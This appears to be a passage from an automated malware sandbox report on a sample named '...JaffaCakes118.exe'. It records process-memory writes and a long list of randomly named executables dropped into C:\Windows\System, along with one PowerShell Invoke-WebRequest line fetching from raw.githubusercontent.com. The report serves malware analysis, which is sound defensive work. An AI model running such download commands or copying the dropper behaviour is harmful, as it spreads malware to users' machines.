PID 1280 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\DSvJLfo.exe
PID 1280 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\DSvJLfo.exe
PID 1280 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\pQBnhmq.exe
PID 1280 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\pQBnhmq.exe
PID 1280 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LUoxmgL.exe
PID 1280 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LUoxmgL.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\IQFfCth.exe

C:\Windows\System\IQFfCth.exe

C:\Windows\System\jsGJPoJ.exe

C:\Windows\System\jsGJPoJ.exe

C:\Windows\System\dRthmix.exe

C:\Windows\System\dRthmix.exe

C:\Windows\System\VFePrpe.exe

C:\Windows\System\VFePrpe.exe

C:\Windows\System\wsVwhZx.exe

C:\Windows\System\wsVwhZx.exe

C:\Windows\System\IlXXiFS.exe

C:\Windows\System\IlXXiFS.exe

C:\Windows\System\UWrullI.exe

C:\Windows\System\UWrullI.exe

C:\Windows\System\yHJffaT.exe

C:\Windows\System\yHJffaT.exe

C:\Windows\System\onNIwkp.exe

C:\Windows\System\onNIwkp.exe

C:\Windows\System\nLlrHaS.exe

C:\Windows\System\nLlrHaS.exe

C:\Windows\System\CQeSpfA.exe

C:\Windows\System\CQeSpfA.exe

C:\Windows\System\LQWCntI.exe

C:\Windows\System\LQWCntI.exe

C:\Windows\System\LaBKhzw.exe

C:\Windows\System\LaBKhzw.exe

C:\Windows\System\ydKZEUK.exe

C:\Windows\System\ydKZEUK.exe

C:\Windows\System\TVUgmGi.exe

C:\Windows\System\TVUgmGi.exe

C:\Windows\System\jLuZyni.exe

C:\Windows\System\jLuZyni.exe

C:\Windows\System\BHZkard.exe

C:\Windows\System\BHZkard.exe

C:\Windows\System\srKygpS.exe

C:\Windows\System\srKygpS.exe

C:\Windows\System\rYtkDvr.exe

C:\Windows\System\rYtkDvr.exe

C:\Windows\System\xqNueVZ.exe

C:\Windows\System\xqNueVZ.exe

C:\Windows\System\ycDwHFp.exe

C:\Windows\System\ycDwHFp.exe

C:\Windows\System\uoFQlRv.exe

C:\Windows\System\uoFQlRv.exe

C:\Windows\System\HMHAgcj.exe

C:\Windows\System\HMHAgcj.exe

C:\Windows\System\GyZTFQx.exe

C:\Windows\System\GyZTFQx.exe

C:\Windows\System\QkVyFyb.exe

C:\Windows\System\QkVyFyb.exe

C:\Windows\System\SKObWWE.exe

C:\Windows\System\SKObWWE.exe

C:\Windows\System\RsYOGdF.exe

C:\Windows\System\RsYOGdF.exe

C:\Windows\System\glmuLZG.exe

C:\Windows\System\glmuLZG.exe

C:\Windows\System\DSvJLfo.exe

C:\Windows\System\DSvJLfo.exe

C:\Windows\System\pQBnhmq.exe

C:\Windows\System\pQBnhmq.exe

C:\Windows\System\LUoxmgL.exe

C:\Windows\System\LUoxmgL.exe

C:\Windows\System\geEXswD.exe

C:\Windows\System\geEXswD.exe

C:\Windows\System\gxqIXbk.exe

C:\Windows\System\gxqIXbk.exe

C:\Windows\System\mHJgwgC.exe

C:\Windows\System\mHJgwgC.exe

C:\Windows\System\lgeqSIa.exe

C:\Windows\System\lgeqSIa.exe

C:\Windows\System\ScvXigm.exe

C:\Windows\System\ScvXigm.exe

C:\Windows\System\kZNzntD.exe

C:\Windows\System\kZNzntD.exe

C:\Windows\System\QoHGlYR.exe

C:\Windows\System\QoHGlYR.exe

C:\Windows\System\xznFXir.exe

C:\Windows\System\xznFXir.exe

C:\Windows\System\kdtEmjx.exe

C:\Windows\System\kdtEmjx.exe

C:\Windows\System\ZTZAJFH.exe

C:\Windows\System\ZTZAJFH.exe

C:\Windows\System\DtBLSHv.exe

C:\Windows\System\DtBLSHv.exe

C:\Windows\System\ReeOOlu.exe

C:\Windows\System\ReeOOlu.exe

C:\Windows\System\leFjYMA.exe

C:\Windows\System\leFjYMA.exe

C:\Windows\System\VPXMlkt.exe

C:\Windows\System\VPXMlkt.exe

C:\Windows\System\GhwdndH.exe

C:\Windows\System\GhwdndH.exe

C:\Windows\System\bDwRWIN.exe

C:\Windows\System\bDwRWIN.exe

C:\Windows\System\txGCBbC.exe

C:\Windows\System\txGCBbC.exe

C:\Windows\System\ngcQWFK.exe

C:\Windows\System\ngcQWFK.exe

C:\Windows\System\udqXNOw.exe

C:\Windows\System\udqXNOw.exe

C:\Windows\System\XMkfgGK.exe

C:\Windows\System\XMkfgGK.exe

C:\Windows\System\tCciNBj.exe

C:\Windows\System\tCciNBj.exe

C:\Windows\System\EPwuAGi.exe

C:\Windows\System\EPwuAGi.exe

C:\Windows\System\jODivET.exe

C:\Windows\System\jODivET.exe

C:\Windows\System\qPcxKLr.exe

C:\Windows\System\qPcxKLr.exe

C:\Windows\System\GXCOoej.exe

C:\Windows\System\GXCOoej.exe

C:\Windows\System\xMxRYbM.exe

C:\Windows\System\xMxRYbM.exe

C:\Windows\System\vnLqjoH.exe

C:\Windows\System\vnLqjoH.exe

C:\Windows\System\OeoYgEa.exe

C:\Windows\System\OeoYgEa.exe

C:\Windows\System\RMqnZkd.exe

C:\Windows\System\RMqnZkd.exe

C:\Windows\System\nmllLwd.exe

C:\Windows\System\nmllLwd.exe

C:\Windows\System\QexJLhA.exe

C:\Windows\System\QexJLhA.exe

C:\Windows\System\JZSlpyC.exe

C:\Windows\System\JZSlpyC.exe

C:\Windows\System\cFxuvpP.exe

C:\Windows\System\cFxuvpP.exe

C:\Windows\System\gmLHvtC.exe

C:\Windows\System\gmLHvtC.exe

C:\Windows\System\QJuHDhg.exe

C:\Windows\System\QJuHDhg.exe

C:\Windows\System\gvSjgmV.exe

C:\Windows\System\gvSjgmV.exe

C:\Windows\System\TgDCjBZ.exe

C:\Windows\System\TgDCjBZ.exe

C:\Windows\System\NiLVBQl.exe

C:\Windows\System\NiLVBQl.exe

C:\Windows\System\TPzgCkS.exe

C:\Windows\System\TPzgCkS.exe

C:\Windows\System\pzxzWjr.exe

C:\Windows\System\pzxzWjr.exe

C:\Windows\System\aoKjgkL.exe

C:\Windows\System\aoKjgkL.exe

C:\Windows\System\oEykGIM.exe

C:\Windows\System\oEykGIM.exe

C:\Windows\System\aUWtOPm.exe

C:\Windows\System\aUWtOPm.exe

C:\Windows\System\iPARKUU.exe

C:\Windows\System\iPARKUU.exe

C:\Windows\System\hEYnvmd.exe

C:\Windows\System\hEYnvmd.exe

C:\Windows\System\ZIkBaaQ.exe

C:\Windows\System\ZIkBaaQ.exe

C:\Windows\System\AiHetrL.exe

C:\Windows\System\AiHetrL.exe

C:\Windows\System\afmYDJZ.exe

C:\Windows\System\afmYDJZ.exe

C:\Windows\System\CHmTDVF.exe

C:\Windows\System\CHmTDVF.exe

C:\Windows\System\WOBMGQb.exe

C:\Windows\System\WOBMGQb.exe

C:\Windows\System\tCWtqhw.exe

C:\Windows\System\tCWtqhw.exe

C:\Windows\System\PCUwNTo.exe

C:\Windows\System\PCUwNTo.exe

C:\Windows\System\yodzTwO.exe

C:\Windows\System\yodzTwO.exe

C:\Windows\System\aPgwcBi.exe

C:\Windows\System\aPgwcBi.exe

C:\Windows\System\yHTdZer.exe

C:\Windows\System\yHTdZer.exe

C:\Windows\System\OTzuCYO.exe

C:\Windows\System\OTzuCYO.exe

C:\Windows\System\RkGwYhr.exe

C:\Windows\System\RkGwYhr.exe

C:\Windows\System\OfYvwgb.exe

C:\Windows\System\OfYvwgb.exe

C:\Windows\System\xNorgOb.exe

C:\Windows\System\xNorgOb.exe

C:\Windows\System\BqLXlGt.exe

C:\Windows\System\BqLXlGt.exe

C:\Windows\System\bXPUHhv.exe

C:\Windows\System\bXPUHhv.exe

C:\Windows\System\QVxeqQh.exe

C:\Windows\System\QVxeqQh.exe

C:\Windows\System\xuFdODw.exe

C:\Windows\System\xuFdODw.exe

C:\Windows\System\vfkxuVN.exe

C:\Windows\System\vfkxuVN.exe

C:\Windows\System\OnLMCCy.exe

C:\Windows\System\OnLMCCy.exe

C:\Windows\System\YbVqNTr.exe

C:\Windows\System\YbVqNTr.exe

C:\Windows\System\xhOaOLk.exe

C:\Windows\System\xhOaOLk.exe

C:\Windows\System\ZvNoned.exe

C:\Windows\System\ZvNoned.exe

C:\Windows\System\IsMkypb.exe

C:\Windows\System\IsMkypb.exe

C:\Windows\System\YCnZnUg.exe

C:\Windows\System\YCnZnUg.exe

C:\Windows\System\mOIZehH.exe

C:\Windows\System\mOIZehH.exe

C:\Windows\System\vSbmTfV.exe

C:\Windows\System\vSbmTfV.exe

C:\Windows\System\ZqDnlkw.exe

C:\Windows\System\ZqDnlkw.exe

C:\Windows\System\YKYtrzS.exe

C:\Windows\System\YKYtrzS.exe

C:\Windows\System\BsGmAkX.exe

C:\Windows\System\BsGmAkX.exe

C:\Windows\System\MUEWOjz.exe

C:\Windows\System\MUEWOjz.exe

C:\Windows\System\Asjhrbo.exe

C:\Windows\System\Asjhrbo.exe

C:\Windows\System\jGPrclg.exe

C:\Windows\System\jGPrclg.exe

C:\Windows\System\aMsereD.exe

C:\Windows\System\aMsereD.exe

C:\Windows\System\ClDjMgd.exe

C:\Windows\System\ClDjMgd.exe

C:\Windows\System\XzVlvwp.exe

C:\Windows\System\XzVlvwp.exe

C:\Windows\System\AOgqfPh.exe

C:\Windows\System\AOgqfPh.exe

C:\Windows\System\kJbNtvA.exe

C:\Windows\System\kJbNtvA.exe

C:\Windows\System\ELRnwwd.exe

C:\Windows\System\ELRnwwd.exe

C:\Windows\System\SARpatq.exe

C:\Windows\System\SARpatq.exe

C:\Windows\System\TkoXRFo.exe

C:\Windows\System\TkoXRFo.exe

C:\Windows\System\iiRmEOA.exe

C:\Windows\System\iiRmEOA.exe

C:\Windows\System\PEvzLqW.exe

C:\Windows\System\PEvzLqW.exe

C:\Windows\System\vCwZyAk.exe

C:\Windows\System\vCwZyAk.exe

C:\Windows\System\iFboigo.exe

C:\Windows\System\iFboigo.exe

C:\Windows\System\ZlUqtwP.exe

C:\Windows\System\ZlUqtwP.exe

C:\Windows\System\drjykRK.exe

C:\Windows\System\drjykRK.exe

C:\Windows\System\bkuGNPS.exe

C:\Windows\System\bkuGNPS.exe

C:\Windows\System\ZWZNwKh.exe

C:\Windows\System\ZWZNwKh.exe

C:\Windows\System\BiEjPcF.exe

C:\Windows\System\BiEjPcF.exe

C:\Windows\System\NQqbmcS.exe

C:\Windows\System\NQqbmcS.exe

C:\Windows\System\RwrBhzj.exe

C:\Windows\System\RwrBhzj.exe

C:\Windows\System\EQrsCyr.exe

C:\Windows\System\EQrsCyr.exe

C:\Windows\System\wcdYHWY.exe

C:\Windows\System\wcdYHWY.exe

C:\Windows\System\hPvQiuC.exe

C:\Windows\System\hPvQiuC.exe

C:\Windows\System\ZrNtAGU.exe

C:\Windows\System\ZrNtAGU.exe

C:\Windows\System\dyMfFrb.exe

C:\Windows\System\dyMfFrb.exe

C:\Windows\System\JVoKVeq.exe

C:\Windows\System\JVoKVeq.exe

C:\Windows\System\tkEsGOZ.exe

C:\Windows\System\tkEsGOZ.exe

C:\Windows\System\lvtBtuw.exe

C:\Windows\System\lvtBtuw.exe

C:\Windows\System\AVsqTUv.exe

C:\Windows\System\AVsqTUv.exe

C:\Windows\System\LyqBdHD.exe

C:\Windows\System\LyqBdHD.exe

C:\Windows\System\IQCeSZh.exe

C:\Windows\System\IQCeSZh.exe

C:\Windows\System\LQQpdgt.exe

C:\Windows\System\LQQpdgt.exe

C:\Windows\System\kgJcjlx.exe

C:\Windows\System\kgJcjlx.exe

C:\Windows\System\peOvRCn.exe

C:\Windows\System\peOvRCn.exe

C:\Windows\System\lceYiCu.exe

C:\Windows\System\lceYiCu.exe

C:\Windows\System\sVJkwyg.exe

C:\Windows\System\sVJkwyg.exe

C:\Windows\System\oBtldnf.exe

C:\Windows\System\oBtldnf.exe

C:\Windows\System\MyArEMf.exe

C:\Windows\System\MyArEMf.exe

C:\Windows\System\atCILXd.exe

C:\Windows\System\atCILXd.exe

C:\Windows\System\DeehaVH.exe

C:\Windows\System\DeehaVH.exe

C:\Windows\System\MzAnhQt.exe

C:\Windows\System\MzAnhQt.exe

C:\Windows\System\paJjnUi.exe

C:\Windows\System\paJjnUi.exe

C:\Windows\System\xOglvex.exe

C:\Windows\System\xOglvex.exe

C:\Windows\System\PotWghK.exe

C:\Windows\System\PotWghK.exe

C:\Windows\System\VGguhvS.exe

C:\Windows\System\VGguhvS.exe

C:\Windows\System\bRqcSCA.exe

C:\Windows\System\bRqcSCA.exe

C:\Windows\System\EdCmhhR.exe

C:\Windows\System\EdCmhhR.exe

C:\Windows\System\LNOvyOk.exe

C:\Windows\System\LNOvyOk.exe

C:\Windows\System\PyORNIg.exe

C:\Windows\System\PyORNIg.exe

C:\Windows\System\FtuzOpM.exe

C:\Windows\System\FtuzOpM.exe

C:\Windows\System\XtwRZHC.exe

C:\Windows\System\XtwRZHC.exe

C:\Windows\System\qlVRdwf.exe

C:\Windows\System\qlVRdwf.exe

C:\Windows\System\sslRxlO.exe

C:\Windows\System\sslRxlO.exe

C:\Windows\System\BAGqYKz.exe

C:\Windows\System\BAGqYKz.exe

C:\Windows\System\XoHgvoM.exe

C:\Windows\System\XoHgvoM.exe

C:\Windows\System\izDGooX.exe

C:\Windows\System\izDGooX.exe

C:\Windows\System\DRbxLey.exe

C:\Windows\System\DRbxLey.exe

C:\Windows\System\ZoVlavc.exe

C:\Windows\System\ZoVlavc.exe

C:\Windows\System\uoIEeBX.exe

C:\Windows\System\uoIEeBX.exe

C:\Windows\System\UyMVQoP.exe

C:\Windows\System\UyMVQoP.exe

C:\Windows\System\WhpHWTk.exe

C:\Windows\System\WhpHWTk.exe

C:\Windows\System\htqkXVx.exe

C:\Windows\System\htqkXVx.exe

C:\Windows\System\dcSReTx.exe

C:\Windows\System\dcSReTx.exe

C:\Windows\System\YilrcdH.exe

C:\Windows\System\YilrcdH.exe

C:\Windows\System\UuuokVf.exe

C:\Windows\System\UuuokVf.exe

C:\Windows\System\mutASgL.exe

C:\Windows\System\mutASgL.exe

C:\Windows\System\NKvmgCo.exe

C:\Windows\System\NKvmgCo.exe

C:\Windows\System\EQYvUaV.exe

C:\Windows\System\EQYvUaV.exe

C:\Windows\System\dpthTiz.exe

C:\Windows\System\dpthTiz.exe

C:\Windows\System\EeTCFgt.exe

C:\Windows\System\EeTCFgt.exe

C:\Windows\System\YvhihRQ.exe

C:\Windows\System\YvhihRQ.exe

C:\Windows\System\jqmpGPM.exe

C:\Windows\System\jqmpGPM.exe

C:\Windows\System\ALsnucg.exe

C:\Windows\System\ALsnucg.exe

C:\Windows\System\uUgSfll.exe

C:\Windows\System\uUgSfll.exe

C:\Windows\System\wwfGGHw.exe

C:\Windows\System\wwfGGHw.exe

C:\Windows\System\qnBnzye.exe

C:\Windows\System\qnBnzye.exe

C:\Windows\System\mqJmSev.exe

C:\Windows\System\mqJmSev.exe

C:\Windows\System\ylRVXvQ.exe

C:\Windows\System\ylRVXvQ.exe

C:\Windows\System\GVZKrAX.exe

C:\Windows\System\GVZKrAX.exe

C:\Windows\System\pfDFzmG.exe

C:\Windows\System\pfDFzmG.exe

C:\Windows\System\SsMjJVT.exe

C:\Windows\System\SsMjJVT.exe

C:\Windows\System\PmDaCxi.exe

C:\Windows\System\PmDaCxi.exe

C:\Windows\System\ljraKLJ.exe

C:\Windows\System\ljraKLJ.exe

C:\Windows\System\wBwLYVY.exe

C:\Windows\System\wBwLYVY.exe

C:\Windows\System\sdXtPxv.exe

C:\Windows\System\sdXtPxv.exe

C:\Windows\System\tFrwTTW.exe

C:\Windows\System\tFrwTTW.exe

C:\Windows\System\IFyXtiQ.exe

C:\Windows\System\IFyXtiQ.exe

C:\Windows\System\TaRBXhB.exe

C:\Windows\System\TaRBXhB.exe

C:\Windows\System\jLZxxtp.exe

C:\Windows\System\jLZxxtp.exe

C:\Windows\System\AnLsmdZ.exe

C:\Windows\System\AnLsmdZ.exe

C:\Windows\System\WAcSwvv.exe

C:\Windows\System\WAcSwvv.exe

C:\Windows\System\NDQmGEe.exe

C:\Windows\System\NDQmGEe.exe

C:\Windows\System\xOzwNnY.exe

C:\Windows\System\xOzwNnY.exe

C:\Windows\System\qeSkgsZ.exe

C:\Windows\System\qeSkgsZ.exe

C:\Windows\System\MzbKLSA.exe

C:\Windows\System\MzbKLSA.exe

C:\Windows\System\ZvJjREj.exe

C:\Windows\System\ZvJjREj.exe

C:\Windows\System\SdlVxLO.exe

C:\Windows\System\SdlVxLO.exe

C:\Windows\System\fiyJGQX.exe

C:\Windows\System\fiyJGQX.exe

C:\Windows\System\QmSVvUL.exe

C:\Windows\System\QmSVvUL.exe

C:\Windows\System\DoHPebN.exe

C:\Windows\System\DoHPebN.exe

C:\Windows\System\FDfuajn.exe

C:\Windows\System\FDfuajn.exe

C:\Windows\System\lAObueu.exe

C:\Windows\System\lAObueu.exe

C:\Windows\System\WmcOZSX.exe

C:\Windows\System\WmcOZSX.exe

C:\Windows\System\NoBPrAu.exe

C:\Windows\System\NoBPrAu.exe

C:\Windows\System\URnUWvg.exe

C:\Windows\System\URnUWvg.exe

C:\Windows\System\BpZtQdF.exe

C:\Windows\System\BpZtQdF.exe

C:\Windows\System\XMiAFBP.exe

C:\Windows\System\XMiAFBP.exe

C:\Windows\System\PGIkXEe.exe

C:\Windows\System\PGIkXEe.exe

C:\Windows\System\PYxZkop.exe

C:\Windows\System\PYxZkop.exe

C:\Windows\System\ageJgFh.exe

C:\Windows\System\ageJgFh.exe

C:\Windows\System\YWEHgVL.exe

C:\Windows\System\YWEHgVL.exe

C:\Windows\System\TPRPHko.exe

C:\Windows\System\TPRPHko.exe

C:\Windows\System\MpCfpkI.exe

C:\Windows\System\MpCfpkI.exe

C:\Windows\System\BCwHEdN.exe

C:\Windows\System\BCwHEdN.exe

C:\Windows\System\DwKWKXP.exe

C:\Windows\System\DwKWKXP.exe

C:\Windows\System\EMZkXCd.exe

C:\Windows\System\EMZkXCd.exe

C:\Windows\System\VFGkoBH.exe

C:\Windows\System\VFGkoBH.exe

C:\Windows\System\AqOOHVL.exe

C:\Windows\System\AqOOHVL.exe

C:\Windows\System\XSdvfNh.exe

C:\Windows\System\XSdvfNh.exe

C:\Windows\System\oRLwFwL.exe

C:\Windows\System\oRLwFwL.exe

C:\Windows\System\QNPofkl.exe

C:\Windows\System\QNPofkl.exe

C:\Windows\System\TiYaYfc.exe

C:\Windows\System\TiYaYfc.exe

C:\Windows\System\FijHHtI.exe

C:\Windows\System\FijHHtI.exe

C:\Windows\System\CvFtzDI.exe

C:\Windows\System\CvFtzDI.exe

C:\Windows\System\NLehcAV.exe

C:\Windows\System\NLehcAV.exe

C:\Windows\System\XIRAWNM.exe

C:\Windows\System\XIRAWNM.exe

C:\Windows\System\EFquXMI.exe

C:\Windows\System\EFquXMI.exe

C:\Windows\System\AXBRkgu.exe

C:\Windows\System\AXBRkgu.exe

C:\Windows\System\fEMlXVb.exe

C:\Windows\System\fEMlXVb.exe

C:\Windows\System\CzgrWhS.exe

C:\Windows\System\CzgrWhS.exe

C:\Windows\System\MPwijJn.exe

C:\Windows\System\MPwijJn.exe

C:\Windows\System\myWIeqa.exe

C:\Windows\System\myWIeqa.exe

C:\Windows\System\rPrVdnw.exe

C:\Windows\System\rPrVdnw.exe

C:\Windows\System\OFCmaIj.exe

C:\Windows\System\OFCmaIj.exe

C:\Windows\System\BZszFmR.exe

C:\Windows\System\BZszFmR.exe

C:\Windows\System\ooZGgzd.exe

C:\Windows\System\ooZGgzd.exe

C:\Windows\System\EYDhMnA.exe

C:\Windows\System\EYDhMnA.exe

C:\Windows\System\mnAWpHN.exe

C:\Windows\System\mnAWpHN.exe

C:\Windows\System\AMYSfZG.exe

C:\Windows\System\AMYSfZG.exe

C:\Windows\System\DVhwokd.exe

C:\Windows\System\DVhwokd.exe

C:\Windows\System\TyhyQNd.exe

C:\Windows\System\TyhyQNd.exe

C:\Windows\System\taVTtqC.exe

C:\Windows\System\taVTtqC.exe

C:\Windows\System\SNeRPop.exe

C:\Windows\System\SNeRPop.exe

C:\Windows\System\rbZZnYJ.exe

C:\Windows\System\rbZZnYJ.exe

C:\Windows\System\QctADvd.exe

C:\Windows\System\QctADvd.exe

C:\Windows\System\NuItzwx.exe

C:\Windows\System\NuItzwx.exe

C:\Windows\System\dVlKUjQ.exe

C:\Windows\System\dVlKUjQ.exe

C:\Windows\System\tzZHSne.exe

C:\Windows\System\tzZHSne.exe

C:\Windows\System\tWBbWZe.exe

C:\Windows\System\tWBbWZe.exe

C:\Windows\System\tvoHQvd.exe

C:\Windows\System\tvoHQvd.exe

C:\Windows\System\hUNlnlv.exe

C:\Windows\System\hUNlnlv.exe

C:\Windows\System\FYVmtqK.exe

C:\Windows\System\FYVmtqK.exe

C:\Windows\System\HiIZFeo.exe

C:\Windows\System\HiIZFeo.exe

C:\Windows\System\nkqrdBW.exe

C:\Windows\System\nkqrdBW.exe

C:\Windows\System\TElNkKD.exe

C:\Windows\System\TElNkKD.exe

C:\Windows\System\MNSFbth.exe

C:\Windows\System\MNSFbth.exe

C:\Windows\System\SePyCvt.exe

C:\Windows\System\SePyCvt.exe

C:\Windows\System\oolpLwN.exe

C:\Windows\System\oolpLwN.exe

C:\Windows\System\uHLhomU.exe

C:\Windows\System\uHLhomU.exe

C:\Windows\System\DKYmEaq.exe

C:\Windows\System\DKYmEaq.exe

C:\Windows\System\OkhAWxl.exe

C:\Windows\System\OkhAWxl.exe

C:\Windows\System\BmTcKjJ.exe

C:\Windows\System\BmTcKjJ.exe

C:\Windows\System\XXcrfNb.exe

C:\Windows\System\XXcrfNb.exe

C:\Windows\System\JpAlPEm.exe

C:\Windows\System\JpAlPEm.exe

C:\Windows\System\HBCcJZe.exe

C:\Windows\System\HBCcJZe.exe

C:\Windows\System\kQXiRpv.exe

C:\Windows\System\kQXiRpv.exe

C:\Windows\System\JJxuEhL.exe

C:\Windows\System\JJxuEhL.exe

C:\Windows\System\eFcCOoV.exe

C:\Windows\System\eFcCOoV.exe

C:\Windows\System\vUCvTCp.exe

C:\Windows\System\vUCvTCp.exe

C:\Windows\System\JDiIqrW.exe

C:\Windows\System\JDiIqrW.exe

C:\Windows\System\ydSEVOU.exe

C:\Windows\System\ydSEVOU.exe

C:\Windows\System\ZxmIKUo.exe

C:\Windows\System\ZxmIKUo.exe

C:\Windows\System\CichKim.exe

C:\Windows\System\CichKim.exe

C:\Windows\System\sYdICkY.exe

C:\Windows\System\sYdICkY.exe

C:\Windows\System\LxgHEse.exe

C:\Windows\System\LxgHEse.exe

C:\Windows\System\wMlbCNG.exe

C:\Windows\System\wMlbCNG.exe

C:\Windows\System\whKzQQF.exe

C:\Windows\System\whKzQQF.exe

C:\Windows\System\lgvGUqM.exe

C:\Windows\System\lgvGUqM.exe

C:\Windows\System\bBxAVEH.exe

C:\Windows\System\bBxAVEH.exe

C:\Windows\System\YVNJiQE.exe

C:\Windows\System\YVNJiQE.exe

C:\Windows\System\ZyckASr.exe

C:\Windows\System\ZyckASr.exe

C:\Windows\System\NZQjhnE.exe

C:\Windows\System\NZQjhnE.exe

C:\Windows\System\FWlYMaT.exe

C:\Windows\System\FWlYMaT.exe

C:\Windows\System\jUHrXBh.exe

C:\Windows\System\jUHrXBh.exe

C:\Windows\System\nnaNExt.exe

C:\Windows\System\nnaNExt.exe

C:\Windows\System\OHZrMgH.exe

C:\Windows\System\OHZrMgH.exe

C:\Windows\System\UMLWaeM.exe

C:\Windows\System\UMLWaeM.exe

C:\Windows\System\WthbDSC.exe

C:\Windows\System\WthbDSC.exe

C:\Windows\System\EdBMkDl.exe

C:\Windows\System\EdBMkDl.exe

C:\Windows\System\fVsvCZU.exe

C:\Windows\System\fVsvCZU.exe

C:\Windows\System\RMKmsAw.exe

C:\Windows\System\RMKmsAw.exe

C:\Windows\System\pUWNWcX.exe

C:\Windows\System\pUWNWcX.exe

C:\Windows\System\UExQzZQ.exe

C:\Windows\System\UExQzZQ.exe

C:\Windows\System\WRPqxik.exe

C:\Windows\System\WRPqxik.exe

C:\Windows\System\gACirqQ.exe

C:\Windows\System\gACirqQ.exe

C:\Windows\System\vhKbbjt.exe

C:\Windows\System\vhKbbjt.exe

C:\Windows\System\pBTZZaA.exe

C:\Windows\System\pBTZZaA.exe

C:\Windows\System\rlgwaoH.exe

C:\Windows\System\rlgwaoH.exe

C:\Windows\System\tIuPOXI.exe

C:\Windows\System\tIuPOXI.exe

C:\Windows\System\uNGXQAm.exe

C:\Windows\System\uNGXQAm.exe

C:\Windows\System\hKxuVKF.exe

C:\Windows\System\hKxuVKF.exe

C:\Windows\System\JRuMABA.exe

C:\Windows\System\JRuMABA.exe

C:\Windows\System\VTGWDRS.exe

C:\Windows\System\VTGWDRS.exe

C:\Windows\System\uRVvWNR.exe

C:\Windows\System\uRVvWNR.exe

C:\Windows\System\AeKeNmi.exe

C:\Windows\System\AeKeNmi.exe

C:\Windows\System\ihsAfFu.exe

C:\Windows\System\ihsAfFu.exe

C:\Windows\System\gKebXXJ.exe

C:\Windows\System\gKebXXJ.exe

C:\Windows\System\ppgFFLb.exe

C:\Windows\System\ppgFFLb.exe

C:\Windows\System\MpiUAMZ.exe

C:\Windows\System\MpiUAMZ.exe

C:\Windows\System\nBGeeQo.exe

C:\Windows\System\nBGeeQo.exe

C:\Windows\System\BSpuMSh.exe

C:\Windows\System\BSpuMSh.exe

C:\Windows\System\sTgCRAu.exe

C:\Windows\System\sTgCRAu.exe

C:\Windows\System\xKvlIjo.exe

C:\Windows\System\xKvlIjo.exe

C:\Windows\System\vrskUHQ.exe

C:\Windows\System\vrskUHQ.exe

C:\Windows\System\cpzmyQE.exe

C:\Windows\System\cpzmyQE.exe

C:\Windows\System\QzqzkFa.exe

C:\Windows\System\QzqzkFa.exe

C:\Windows\System\pbzUigx.exe

C:\Windows\System\pbzUigx.exe

C:\Windows\System\lZviqrD.exe

C:\Windows\System\lZviqrD.exe

C:\Windows\System\ULAFauS.exe

C:\Windows\System\ULAFauS.exe

C:\Windows\System\AEYPlSK.exe

C:\Windows\System\AEYPlSK.exe

C:\Windows\System\LiABZgZ.exe

C:\Windows\System\LiABZgZ.exe

C:\Windows\System\XbiVWrG.exe

C:\Windows\System\XbiVWrG.exe

C:\Windows\System\uVmqAqw.exe

C:\Windows\System\uVmqAqw.exe

C:\Windows\System\ZlLVNCT.exe

C:\Windows\System\ZlLVNCT.exe

C:\Windows\System\QZQrgOd.exe

C:\Windows\System\QZQrgOd.exe

C:\Windows\System\LhZLzvS.exe

C:\Windows\System\LhZLzvS.exe

C:\Windows\System\KHjhAqu.exe

C:\Windows\System\KHjhAqu.exe

C:\Windows\System\BXMWpgZ.exe

C:\Windows\System\BXMWpgZ.exe

C:\Windows\System\QCmDOZj.exe

C:\Windows\System\QCmDOZj.exe

C:\Windows\System\uFXofqp.exe

C:\Windows\System\uFXofqp.exe

C:\Windows\System\ipsaXEk.exe

C:\Windows\System\ipsaXEk.exe

C:\Windows\System\MmtNbyv.exe

C:\Windows\System\MmtNbyv.exe

C:\Windows\System\rxvOZkf.exe

C:\Windows\System\rxvOZkf.exe

C:\Windows\System\YxEoLiz.exe

C:\Windows\System\YxEoLiz.exe

C:\Windows\System\dXLRkZo.exe

C:\Windows\System\dXLRkZo.exe

C:\Windows\System\Bazaavr.exe

C:\Windows\System\Bazaavr.exe

C:\Windows\System\pkHlNej.exe

C:\Windows\System\pkHlNej.exe

C:\Windows\System\otgOEKM.exe

C:\Windows\System\otgOEKM.exe

C:\Windows\System\ENoucDK.exe

C:\Windows\System\ENoucDK.exe

C:\Windows\System\ksTbsyg.exe

C:\Windows\System\ksTbsyg.exe

C:\Windows\System\VDUGQko.exe

C:\Windows\System\VDUGQko.exe

C:\Windows\System\ddYvmtW.exe

C:\Windows\System\ddYvmtW.exe

C:\Windows\System\AfxDOUm.exe

C:\Windows\System\AfxDOUm.exe

C:\Windows\System\igVmNpo.exe

C:\Windows\System\igVmNpo.exe

C:\Windows\System\eTLFWhn.exe

C:\Windows\System\eTLFWhn.exe

C:\Windows\System\MFeYUgi.exe

C:\Windows\System\MFeYUgi.exe

C:\Windows\System\BkkkAuO.exe

C:\Windows\System\BkkkAuO.exe

C:\Windows\System\ZNdqMNz.exe

C:\Windows\System\ZNdqMNz.exe

C:\Windows\System\EidlgKC.exe

C:\Windows\System\EidlgKC.exe

C:\Windows\System\xoWxmPG.exe

C:\Windows\System\xoWxmPG.exe

C:\Windows\System\nlUybGr.exe

C:\Windows\System\nlUybGr.exe

C:\Windows\System\zWLtytV.exe

C:\Windows\System\zWLtytV.exe

C:\Windows\System\PjobiTc.exe

C:\Windows\System\PjobiTc.exe

C:\Windows\System\ebJIZgl.exe

C:\Windows\System\ebJIZgl.exe

